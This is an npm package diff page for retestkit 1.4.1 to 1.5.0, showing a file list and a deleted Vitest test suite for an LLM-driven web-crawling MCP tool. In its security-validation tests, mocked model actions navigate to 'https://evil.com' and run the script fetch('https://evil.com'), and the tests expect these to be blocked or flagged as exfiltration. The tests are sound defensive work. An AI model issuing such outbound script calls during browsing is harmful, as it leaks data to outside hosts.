npm - retestkit - Versions diffs - 1.4.1 → 1.5.0 - Mend

retestkit 1.4.1 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (238)

package/README.md +59 -40
package/dist/config.js +8 -8
package/dist/config.js.map +1 -1
package/dist/logger.js +1 -1
package/dist/logger.js.map +1 -1
package/dist/prompts/index.d.ts +1 -1
package/dist/prompts/index.d.ts.map +1 -1
package/dist/prompts/index.js +21 -21
package/dist/prompts/index.js.map +1 -1
package/dist/prompts/templates/mcp/retest-crawl.md +7 -0
package/{src/prompts/templates/mcp/webtest-discover-flows.md → dist/prompts/templates/mcp/retest-discover-flows.md} +1 -1
package/{src/prompts/templates/mcp/webtest-discover.md → dist/prompts/templates/mcp/retest-discover.md} +2 -2
package/dist/prompts/templates/mcp/retest-full-workflow.md +12 -0
package/{src/prompts/templates/mcp/webtest-generate-tests.md → dist/prompts/templates/mcp/retest-generate-tests.md} +1 -1
package/{src/prompts/templates/mcp/webtest-run-test.md → dist/prompts/templates/mcp/retest-run-test.md} +1 -1
package/{src/prompts/templates/mcp/webtest-start.md → dist/prompts/templates/mcp/retest-start.md} +1 -1
package/{src → dist}/prompts/templates/sampling/system-prefix.md +1 -1
package/dist/resources/index.js +7 -7
package/dist/resources/index.js.map +1 -1
package/dist/schemas/config.js +2 -2
package/dist/schemas/config.js.map +1 -1
package/dist/security/index.js +1 -1
package/dist/security/index.js.map +1 -1
package/dist/server.js +3 -3
package/dist/server.js.map +1 -1
package/dist/test-utils/mock-context.js +22 -22
package/dist/test-utils/mock-context.js.map +1 -1
package/dist/tools/index.d.ts +1 -1
package/dist/tools/index.d.ts.map +1 -1
package/dist/tools/index.js +5 -5
package/dist/tools/index.js.map +1 -1
package/dist/tools/retest/crawl.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/crawl.js +7 -7
package/dist/tools/retest/crawl.js.map +1 -0
package/dist/tools/retest/discover-features.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-features.js +6 -6
package/dist/tools/retest/discover-features.js.map +1 -0
package/dist/tools/retest/discover-flows.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-flows.js +6 -6
package/dist/tools/retest/discover-flows.js.map +1 -0
package/dist/tools/retest/generate-tests.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/generate-tests.js +5 -5
package/dist/tools/retest/generate-tests.js.map +1 -0
package/dist/tools/retest/index.d.ts.map +1 -0
package/dist/tools/retest/index.js.map +1 -0
package/dist/tools/retest/run-test-case.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/run-test-case.js +3 -3
package/dist/tools/retest/run-test-case.js.map +1 -0
package/dist/tools/retest/schemas.d.ts.map +1 -0
package/dist/tools/retest/schemas.js.map +1 -0
package/dist/tools/retest/start-analysis.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/start-analysis.js +5 -5
package/dist/tools/retest/start-analysis.js.map +1 -0
package/dist/workspace/index.js +8 -8
package/dist/workspace/index.js.map +1 -1
package/dist/workspace/types.d.ts +2 -2
package/dist/workspace/types.d.ts.map +1 -1
package/package.json +6 -2
package/.claude/commands/openspec/apply.md +0 -23
package/.claude/commands/openspec/archive.md +0 -27
package/.claude/commands/openspec/proposal.md +0 -28
package/.gemini/commands/openspec/apply.toml +0 -21
package/.gemini/commands/openspec/archive.toml +0 -25
package/.gemini/commands/openspec/proposal.toml +0 -26
package/.github/prompts/openspec-apply.prompt.md +0 -22
package/.github/prompts/openspec-archive.prompt.md +0 -26
package/.github/prompts/openspec-proposal.prompt.md +0 -27
package/.github/workflows/release.yml +0 -33
package/.kilocode/workflows/openspec-apply.md +0 -17
package/.kilocode/workflows/openspec-archive.md +0 -21
package/.kilocode/workflows/openspec-proposal.md +0 -22
package/.mcp.json +0 -23
package/.opencode/command/openspec-apply.md +0 -25
package/.opencode/command/openspec-archive.md +0 -28
package/.opencode/command/openspec-proposal.md +0 -30
package/.roo/commands/openspec-apply.md +0 -20
package/.roo/commands/openspec-archive.md +0 -24
package/.roo/commands/openspec-proposal.md +0 -25
package/.vscode/mcp.json +0 -23
package/AGENTS.md +0 -18
package/CLAUDE.md +0 -18
package/dist/tools/webtest/crawl.d.ts.map +0 -1
package/dist/tools/webtest/crawl.js.map +0 -1
package/dist/tools/webtest/discover-features.d.ts.map +0 -1
package/dist/tools/webtest/discover-features.js.map +0 -1
package/dist/tools/webtest/discover-flows.d.ts.map +0 -1
package/dist/tools/webtest/discover-flows.js.map +0 -1
package/dist/tools/webtest/generate-tests.d.ts.map +0 -1
package/dist/tools/webtest/generate-tests.js.map +0 -1
package/dist/tools/webtest/index.d.ts.map +0 -1
package/dist/tools/webtest/index.js.map +0 -1
package/dist/tools/webtest/run-test-case.d.ts.map +0 -1
package/dist/tools/webtest/run-test-case.js.map +0 -1
package/dist/tools/webtest/schemas.d.ts.map +0 -1
package/dist/tools/webtest/schemas.js.map +0 -1
package/dist/tools/webtest/start-analysis.d.ts.map +0 -1
package/dist/tools/webtest/start-analysis.js.map +0 -1
package/openspec/AGENTS.md +0 -456
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/proposal.md +0 -33
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-resources/spec.md +0 -27
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-tools/spec.md +0 -304
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/tasks.md +0 -43
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/design.md +0 -209
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/proposal.md +0 -41
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/specs/mcp-server-core/spec.md +0 -183
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/tasks.md +0 -112
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/design.md +0 -333
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/proposal.md +0 -66
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/mcp-server-core/spec.md +0 -129
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-lifecycle/spec.md +0 -138
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-logging/spec.md +0 -211
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-prompts/spec.md +0 -157
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-resources/spec.md +0 -213
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-sampling/spec.md +0 -257
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-tools/spec.md +0 -501
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/tasks.md +0 -264
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/proposal.md +0 -24
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/specs/webtest-tools/spec.md +0 -80
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/tasks.md +0 -8
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/design.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/proposal.md +0 -28
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/specs/webtest-sampling/spec.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/tasks.md +0 -33
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/design.md +0 -558
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/proposal.md +0 -119
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-resources/spec.md +0 -109
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-tools/spec.md +0 -121
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/tasks.md +0 -133
package/openspec/changes/extract-prompts-to-markdown/design.md +0 -86
package/openspec/changes/extract-prompts-to-markdown/proposal.md +0 -50
package/openspec/changes/extract-prompts-to-markdown/specs/webtest-prompts/spec.md +0 -74
package/openspec/changes/extract-prompts-to-markdown/tasks.md +0 -40
package/openspec/changes/refactor-webtest-naming/design.md +0 -95
package/openspec/changes/refactor-webtest-naming/proposal.md +0 -66
package/openspec/changes/refactor-webtest-naming/specs/webtest-prompts/spec.md +0 -79
package/openspec/changes/refactor-webtest-naming/specs/webtest-resources/spec.md +0 -80
package/openspec/changes/refactor-webtest-naming/specs/webtest-sampling/spec.md +0 -122
package/openspec/changes/refactor-webtest-naming/specs/webtest-tools/spec.md +0 -113
package/openspec/changes/refactor-webtest-naming/tasks.md +0 -119
package/openspec/changes/rename-package-to-retest/proposal.md +0 -52
package/openspec/changes/rename-package-to-retest/specs/mcp-server-core/spec.md +0 -53
package/openspec/changes/rename-package-to-retest/specs/retest-lifecycle/spec.md +0 -68
package/openspec/changes/rename-package-to-retest/specs/retest-logging/spec.md +0 -35
package/openspec/changes/rename-package-to-retest/specs/retest-prompts/spec.md +0 -159
package/openspec/changes/rename-package-to-retest/specs/retest-resources/spec.md +0 -251
package/openspec/changes/rename-package-to-retest/specs/retest-sampling/spec.md +0 -99
package/openspec/changes/rename-package-to-retest/specs/retest-tools/spec.md +0 -295
package/openspec/changes/rename-package-to-retest/tasks.md +0 -71
package/openspec/project.md +0 -31
package/openspec/specs/mcp-server-core/spec.md +0 -178
package/openspec/specs/webtest-lifecycle/spec.md +0 -136
package/openspec/specs/webtest-logging/spec.md +0 -209
package/openspec/specs/webtest-prompts/spec.md +0 -155
package/openspec/specs/webtest-resources/spec.md +0 -248
package/openspec/specs/webtest-sampling/spec.md +0 -344
package/openspec/specs/webtest-tools/spec.md +0 -282
package/release.config.js +0 -9
package/src/config.test.ts +0 -96
package/src/config.ts +0 -32
package/src/elicitation/index.test.ts +0 -399
package/src/elicitation/index.ts +0 -171
package/src/elicitation/types.ts +0 -68
package/src/index.ts +0 -83
package/src/lifecycle/index.test.ts +0 -260
package/src/lifecycle/index.ts +0 -101
package/src/logger.redaction.test.ts +0 -322
package/src/logger.test.ts +0 -123
package/src/logger.ts +0 -229
package/src/playwright-client/index.ts +0 -392
package/src/playwright-client/types.ts +0 -99
package/src/progress/index.test.ts +0 -327
package/src/progress/index.ts +0 -170
package/src/progress/types.ts +0 -25
package/src/prompts/index.test.ts +0 -451
package/src/prompts/index.ts +0 -246
package/src/prompts/loader.test.ts +0 -100
package/src/prompts/loader.ts +0 -59
package/src/prompts/templates/mcp/webtest-crawl.md +0 -7
package/src/prompts/templates/mcp/webtest-full-workflow.md +0 -12
package/src/resources/index.ts +0 -250
package/src/resources/subscriptions.ts +0 -37
package/src/sampling/index.test.ts +0 -414
package/src/sampling/index.ts +0 -286
package/src/sampling/prompts.ts +0 -194
package/src/sampling/types.ts +0 -60
package/src/schemas/config.ts +0 -39
package/src/security/index.test.ts +0 -441
package/src/security/index.ts +0 -361
package/src/security/security-scenarios.test.ts +0 -468
package/src/server.ts +0 -211
package/src/test-utils/index.ts +0 -6
package/src/test-utils/mock-context.ts +0 -426
package/src/test-utils/mock-playwright-client.ts +0 -422
package/src/tools/index.ts +0 -11
package/src/tools/webtest/crawl.test.ts +0 -834
package/src/tools/webtest/crawl.ts +0 -901
package/src/tools/webtest/discover-features.ts +0 -412
package/src/tools/webtest/discover-flows.ts +0 -408
package/src/tools/webtest/generate-tests.test.ts +0 -532
package/src/tools/webtest/generate-tests.ts +0 -425
package/src/tools/webtest/index.ts +0 -7
package/src/tools/webtest/integration.test.ts +0 -536
package/src/tools/webtest/run-test-case.test.ts +0 -659
package/src/tools/webtest/run-test-case.ts +0 -508
package/src/tools/webtest/schemas.ts +0 -201
package/src/tools/webtest/start-analysis.test.ts +0 -151
package/src/tools/webtest/start-analysis.ts +0 -158
package/src/transports/http.ts +0 -19
package/src/transports/index.ts +0 -30
package/src/transports/stdio.ts +0 -7
package/src/types/capabilities.test.ts +0 -193
package/src/types/capabilities.ts +0 -50
package/src/types/context.ts +0 -21
package/src/types/tool.ts +0 -11
package/src/workspace/index.ts +0 -945
package/src/workspace/markdown.ts +0 -272
package/src/workspace/types.ts +0 -186
package/tests/integration/server.test.ts +0 -89
package/tests/integration/tools.test.ts +0 -99
package/tsconfig.json +0 -20
package/vitest.config.ts +0 -9
package/vitest.integration.config.ts +0 -10
/package/{src → dist}/prompts/templates/sampling/crawl-action.md +0 -0
/package/{src → dist}/prompts/templates/sampling/feature-discovery.md +0 -0
/package/{src → dist}/prompts/templates/sampling/flow-discovery.md +0 -0
/package/{src → dist}/prompts/templates/sampling/page-content-wrapper.md +0 -0
/package/{src → dist}/prompts/templates/sampling/test-evaluation.md +0 -0
/package/{src → dist}/prompts/templates/sampling/test-generation.md +0 -0
/package/dist/tools/{webtest → retest}/crawl.d.ts +0 -0
/package/dist/tools/{webtest → retest}/discover-features.d.ts +0 -0
/package/dist/tools/{webtest → retest}/discover-flows.d.ts +0 -0
/package/dist/tools/{webtest → retest}/generate-tests.d.ts +0 -0
/package/dist/tools/{webtest → retest}/index.d.ts +0 -0
/package/dist/tools/{webtest → retest}/index.js +0 -0
/package/dist/tools/{webtest → retest}/run-test-case.d.ts +0 -0
/package/dist/tools/{webtest → retest}/schemas.d.ts +0 -0
/package/dist/tools/{webtest → retest}/schemas.js +0 -0
/package/dist/tools/{webtest → retest}/start-analysis.d.ts +0 -0

package/src/tools/webtest/crawl.test.ts DELETED

@@ -1,834 +0,0 @@
-/**
- * Unit Tests for webtest_crawl_app tool (Phase 4.13)
- */
-import { describe, it, expect, vi, beforeEach } from "vitest";
-import { createCrawlTool } from "./crawl.js";
-import {
-  createMockContext,
-  type MockContext,
-} from "../../test-utils/index.js";
-describe("webtest_crawl_app", () => {
-  let context: MockContext;
-  let tool: ReturnType<typeof createCrawlTool>;
-  beforeEach(() => {
-    context = createMockContext();
-    tool = createCrawlTool(() => context as any);
-  });
-  describe("tool metadata", () => {
-    it("has correct name", () => {
-      expect(tool.name).toBe("webtest_crawl_app");
-    });
-    it("has a description", () => {
-      expect(tool.description).toBeDefined();
-      expect(tool.description.length).toBeGreaterThan(0);
-    });
-    it("has an input schema", () => {
-      expect(tool.inputSchema).toBeDefined();
-    });
-  });
-  describe("handler - validation", () => {
-    it("returns error for non-existent workspace", async () => {
-      context.workspaceManager.workspaceExists = vi.fn().mockResolvedValue(false);
-      const result = await tool.handler({
-        analysisId: "00000000-0000-0000-0000-000000000000",
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBe(true);
-      expect(result.content[0].text).toContain("not found");
-    });
-    it("validates analysisId format via schema", () => {
-      // The schema requires UUID format
-      const schema = tool.inputSchema;
-      expect(schema).toBeDefined();
-    });
-    it("requires goal parameter", () => {
-      const schema = tool.inputSchema;
-      expect(schema).toBeDefined();
-    });
-  });
-  describe("handler - crawl execution", () => {
-    beforeEach(async () => {
-      // Set up successful sampling that completes immediately
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("creates crawl in workspace", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      expect(context.workspaceManager.createCrawl).toHaveBeenCalled();
-    });
-    it("connects to playwright if not connected", async () => {
-      context.playwrightClient.isConnected = vi.fn().mockReturnValue(false);
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.playwrightClient.connect).toHaveBeenCalled();
-    });
-    it("navigates to workspace URL", async () => {
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.playwrightClient.navigate).toHaveBeenCalled();
-    });
-    it("captures page snapshot", async () => {
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.playwrightClient.snapshot).toHaveBeenCalled();
-    });
-    it("returns crawlId in response", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.crawlId).toBeDefined();
-    });
-    it("returns status completed when goal achieved", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.status).toBe("completed");
-      expect(content.goalComplete).toBe(true);
-    });
-    it("returns next steps after completion", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.nextSteps).toBeInstanceOf(Array);
-      expect(content.nextSteps.length).toBeGreaterThan(0);
-    });
-  });
-  describe("handler - limits", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("uses workspace limits by default", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.workspaceManager.createCrawl).toHaveBeenCalledWith(
-        context.testAnalysisId,
-        expect.objectContaining({
-          limits: expect.objectContaining({
-            maxSteps: expect.any(Number),
-          }),
-        })
-      );
-    });
-    it("respects custom limits", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        limits: { maxSteps: 5 },
-      });
-      expect(context.workspaceManager.createCrawl).toHaveBeenCalledWith(
-        context.testAnalysisId,
-        expect.objectContaining({
-          limits: expect.objectContaining({
-            maxSteps: 5,
-          }),
-        })
-      );
-    });
-  });
-  describe("handler - fallback mode", () => {
-    beforeEach(async () => {
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      await context.playwrightClient.connect();
-    });
-    it("returns prompt when sampling unavailable", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.needsManualInput).toBe(true);
-      expect(content.prompt).toBeDefined();
-    });
-    it("includes instructions for manual mode", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.instructions).toContain("manualNextActions");
-    });
-    it("includes partial results info", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.partialResults).toBeDefined();
-    });
-  });
-  describe("handler - manual actions", () => {
-    beforeEach(async () => {
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      await context.playwrightClient.connect();
-    });
-    it("executes manual actions when provided", async () => {
-      // First call triggers the manual flow and executes the action
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        manualNextActions: [
-          { tool: "click", args: { element: "Submit button", ref: "e1" } },
-        ],
-      });
-      expect(context.playwrightClient.click).toHaveBeenCalledWith("Submit button", "e1");
-    });
-    it("validates manual actions for security", async () => {
-      context.securityValidator.validateAction = vi.fn().mockReturnValue({
-        valid: false,
-        reason: "External domain not allowed",
-      });
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        manualNextActions: [
-          { tool: "navigate", args: { url: "https://evil.com" } },
-        ],
-      });
-      expect(result.isError).toBe(true);
-      expect(result.content[0].text).toContain("Security error");
-    });
-  });
-  describe("handler - cancellation", () => {
-    it("handles cancellation gracefully", async () => {
-      // Set up to throw cancellation error
-      const { CancellationError } = await import("../../progress/index.js");
-      context.cancellationRegistry.checkCancelled = vi.fn().mockImplementation((id) => {
-        throw new CancellationError(id);
-      });
-      await context.playwrightClient.connect();
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.status).toBe("cancelled");
-    });
-    it("registers for cancellation on start", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.cancellationRegistry.register).toHaveBeenCalled();
-    });
-    it("unregisters cancellation on completion", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.cancellationRegistry.unregister).toHaveBeenCalled();
-    });
-  });
-  describe("handler - progress reporting", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("emits progress during crawl", async () => {
-      let stepCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        stepCount++;
-        if (stepCount >= 2) {
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Done",
-              goalProgress: "Complete",
-              goalComplete: true,
-            },
-          };
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "a" } }],
-            reasoning: "Exploring",
-            goalProgress: `Step ${stepCount}`,
-            goalComplete: false,
-          },
-        };
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-      });
-      expect(context.progressEmitter.emit).toHaveBeenCalled();
-    });
-  });
-  describe("handler - checkpoint and resume", () => {
-    beforeEach(async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("supports resume flag", async () => {
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore the site",
-        resume: true,
-      });
-      expect(result.isError).toBeFalsy();
-      expect(context.workspaceManager.loadCheckpoint).toHaveBeenCalled();
-    });
-    it("continues from checkpoint when available", async () => {
-      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue({
-        step: 5,
-        timestamp: new Date().toISOString(),
-        visitedUrls: ["https://shop.example.com", "https://shop.example.com/products"],
-        currentUrl: "https://shop.example.com/products",
-        goalProgress: "Found products",
-        canResume: true,
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Continue exploring",
-        resume: true,
-      });
-      // Should navigate to checkpoint URL
-      expect(context.playwrightClient.navigate).toHaveBeenCalled();
-    });
-    it("starts fresh when no checkpoint available", async () => {
-      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue(null);
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-        resume: true,
-      });
-      // Should still work
-      expect(context.playwrightClient.navigate).toHaveBeenCalled();
-    });
-  });
-  describe("handler - security validation", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("validates actions against allowed domains", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "navigate", args: { url: "https://evil.com" } }],
-          reasoning: "Navigating",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      context.securityValidator.validateAction = vi.fn().mockReturnValue({
-        valid: false,
-        reason: "External domain not allowed",
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.securityValidator.validateAction).toHaveBeenCalled();
-    });
-    it("detects exfiltration attempts", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "evaluate", args: { script: "fetch('https://evil.com')" } }],
-          reasoning: "Running script",
-          goalProgress: "Testing",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      context.securityValidator.detectExfiltrationAttempt = vi.fn().mockReturnValue({
-        detected: true,
-        type: "external_request",
-        evidence: "POST to external",
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.securityValidator.detectExfiltrationAttempt).toHaveBeenCalled();
-    });
-    it("checks for injection in page content", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.securityValidator.detectInjectionAttempt).toHaveBeenCalled();
-    });
-  });
-  describe("handler - action execution", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("executes click actions", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "click", args: { element: "Submit button", ref: "e1" } }],
-          reasoning: "Clicking button",
-          goalProgress: "Clicking",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.playwrightClient.click).toHaveBeenCalledWith("Submit button", "e1");
-    });
-    it("executes type actions", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "type", args: { element: "Input field", ref: "e2", text: "hello" } }],
-          reasoning: "Typing",
-          goalProgress: "Typing",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.playwrightClient.type).toHaveBeenCalledWith("Input field", "e2", "hello", { submit: undefined, slowly: undefined });
-    });
-    it("executes navigate actions", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "navigate", args: { url: "https://shop.example.com/products" } }],
-          reasoning: "Navigating",
-          goalProgress: "Navigating",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.playwrightClient.navigate).toHaveBeenCalledWith("https://shop.example.com/products");
-    });
-    it("records actions in workspace", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "click", args: { selector: "a" } }],
-          reasoning: "Clicking link",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.workspaceManager.recordAction).toHaveBeenCalled();
-    });
-  });
-  describe("handler - blocked state", () => {
-    beforeEach(async () => {
-      await context.playwrightClient.connect();
-    });
-    it("handles blocked response from sampling", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Cannot proceed",
-          goalProgress: "Blocked",
-          goalComplete: false,
-          blocked: true,
-          blockedReason: "Login required",
-        },
-      });
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.blocked).toBe(true);
-      expect(content.blockedReason).toBe("Login required");
-    });
-    it("handles sampling failure", async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: false,
-        error: "LLM error",
-      });
-      const result = await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(result.isError).toBeFalsy();
-      const content = JSON.parse(result.content[0].text!);
-      expect(content.blocked).toBe(true);
-    });
-  });
-  describe("handler - resource notifications", () => {
-    beforeEach(async () => {
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      await context.playwrightClient.connect();
-    });
-    it("notifies on crawl creation", async () => {
-      vi.clearAllMocks();
-      await tool.handler({
-        analysisId: context.testAnalysisId,
-        goal: "Explore",
-      });
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-    it("notifies on page save", async () => {
